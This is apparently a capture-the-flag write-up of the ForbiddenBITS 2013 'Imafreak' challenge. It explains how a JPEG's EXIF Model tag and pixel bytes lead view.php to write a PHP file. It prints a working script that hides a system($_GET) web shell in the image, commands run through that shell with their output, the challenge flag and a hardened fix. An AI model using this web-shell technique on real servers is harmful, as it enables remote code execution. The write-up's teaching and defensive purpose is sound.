
Imafreak - ForbiddenBITS 2013

March 17, 2013

For this challenge, we were given a link to a website (http://192.73.237.131/) and a hint (Hint6[Freak]:~). There, we could upload and view JPEG images:

Following the hint, we can retrieve the source code of the view.php script: an editor backup copy (the trailing ~) was left next to it, at http://192.73.237.131/view.php~.

Wild vulnerability appears in these lines:

        // $camModel comes straight from the EXIF Model tag of the uploaded JPEG,
        // and $dd from its pixel data: both are attacker-controlled.
        $filex="secretstoreddata/".md5(rand(0,100)).($camModel);
        $fp=fopen($filex, 'w');
        fwrite($fp, $dd);
        fclose($fp);

We control the $camModel variable by modifying the EXIF data of the image, and the $dd variable by building a JPEG whose red channel carries our shellcode. The objective is to have view.php write a PHP script (camModel = .php) containing our own payload:

<?php
// payload to embed, one byte per pixel
$shell = '<?php system($_GET["c"]);die; ?>';
$width = strlen($shell);

// create a one-pixel-high true color image, one pixel per payload byte
$img = imagecreatetruecolor($width, 1);
for ($x = 0; $x < $width; $x++) {
    // ASCII value of the current payload byte
    $value = ord($shell[$x]);
    // store it in all three channels (view.php reads the red one);
    // on a true color image imagecolorallocate returns the color value directly
    $color = imagecolorallocate($img, $value, $value, $value);
    imagesetpixel($img, $x, 0, $color);
}

// save at 100% quality to keep JPEG compression from altering the byte values
imagejpeg($img, 'imafreak.jpg', 100);

// set the EXIF Model tag to ".php" with the exiv2 tool, so that view.php
// builds a file name ending in .php
system('exiv2.exe -M "add Exif.Image.Model .php" imafreak.jpg');

The script produces this image (right-click and use "Save target as" to download it and inspect it yourself):

By uploading the JPEG, we can execute commands on the server:

List the files in the site's root folder:
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=ls%20-lia%20../

total 344
7999660 drwxr-xr-x 9 root root   4096 Mar 16 13:46 .
7999659 drwxr-xr-x 6 root root   4096 Feb 15 15:35 ..
8000136 -rw-r--r-- 1 root root    164 Mar 14 21:01 confirmed.txt
7999914 drwxr-xr-x 2 root root   4096 Mar 16 07:29 css
7999917 drwxr-xr-x 6 root root   4096 Mar 16 07:30 css_pirobox
8000029 drwxr-xr-x 2 root root   4096 Mar 16 07:31 images
8000137 -rw-r--r-- 1 root root   2588 Mar 16 07:51 index.php
8000057 drwxr-xr-x 2 root root   4096 Mar 16 07:31 js
8000138 -rw-r--r-- 1 root root    741 Dec 28  2010 piecemaker.css
8000139 -rw-r--r-- 1 root root     39 Mar 14 21:13 robots.txt
8000123 drwxrwxrwx 2 root root  49152 Mar 17 23:52 secretstoreddata
8000140 -rw-r--r-- 1 root root     57 Mar 16 07:24 super_nooooo_flag_dafuq_is_this.php
8000141 -rw-r--r-- 1 root root   8153 Apr  4  2011 templatemo_style.css
8000126 drwxrwxrwx 2 root root 225280 Mar 17 23:52 upload
8000142 -rw-r--r-- 1 root root   3203 Mar 16 13:45 upload.php
8000143 -rw-r--r-- 1 root root   3464 Mar 16 12:02 view.php
8000144 -rw-r--r-- 1 root root   3589 Mar 16 12:02 view.php~
8000134 drwxr-xr-x 2 root root   4096 Mar 16 07:32 wehatebatman

Read the first flag:
view-source:http://192.73.237.131/secretstoreddata/67c6a1e7ce56d3d6fa748ab6d9af3fd7.php?c=cat%20../super_nooooo_flag_dafuq_is_this.php

<?php
/*
FLAG : dafuq_is_this_shit_i_guess_its_flag
*/
?>
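For contrast, this is how the write path quoted from view.php would look once hardened. It is an added example, not code from the challenge: the variable names $dd and $camModel are taken from the page, while STORE_DIR, safeModelLabel() and storeExtractedData() are assumed names for this illustration.

```php
<?php
// Added example, not the challenge's own code. Hardened replacement for the
// four-line write path in view.php. $dd and $camModel keep the meaning they
// have on the page; STORE_DIR and the function names are assumptions.
declare(strict_types=1);

// Directory outside the web root (assumed path): nothing stored here is
// served by the web server, so a stored file can never run as a script.
const STORE_DIR = '/var/app/secretstoreddata';

function safeModelLabel(string $camModel): string
{
    // Allow-list the camera model: letters, digits, space, dash, underscore.
    // No dots, slashes or NUL bytes, and it is kept only as metadata, never
    // used to build the file name.
    if (preg_match('/^[A-Za-z0-9 _-]{1,32}$/', $camModel) !== 1) {
        return 'unknown';
    }
    return $camModel;
}

function storeExtractedData(string $dd, string $camModel): string
{
    // Unpredictable name from a CSPRNG instead of md5(rand(0,100)), which can
    // only yield 101 distinct names. The extension is fixed by the server.
    $name = bin2hex(random_bytes(16)) . '.bin';
    $path = STORE_DIR . DIRECTORY_SEPARATOR . $name;

    // 'x' mode: create exclusively and fail instead of overwriting a file.
    $fp = fopen($path, 'x');
    if ($fp === false) {
        throw new RuntimeException('could not create storage file');
    }
    fwrite($fp, $dd);
    fclose($fp);
    chmod($path, 0640);   // not executable, not world-readable

    // The validated model string goes into a sidecar JSON file, not the name.
    $meta = json_encode(['model' => safeModelLabel($camModel)]);
    file_put_contents($path . '.json', $meta, LOCK_EX);

    return $name;
}
```

Even with the name fixed, the pixel data is still written verbatim, which is why the storage directory must sit where the web server cannot serve or execute anything from it.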

Unfortunately, we were unable to get the second flag during the competition. Afterwards, Phiber from Activalink pointed us to it: it was the first JPEG image uploaded through the imafreak service (http://192.73.237.131/upload/c4ca4238a0b923820dcc509a6f75849b.jpg):

Filed under: Computer challenges, Security
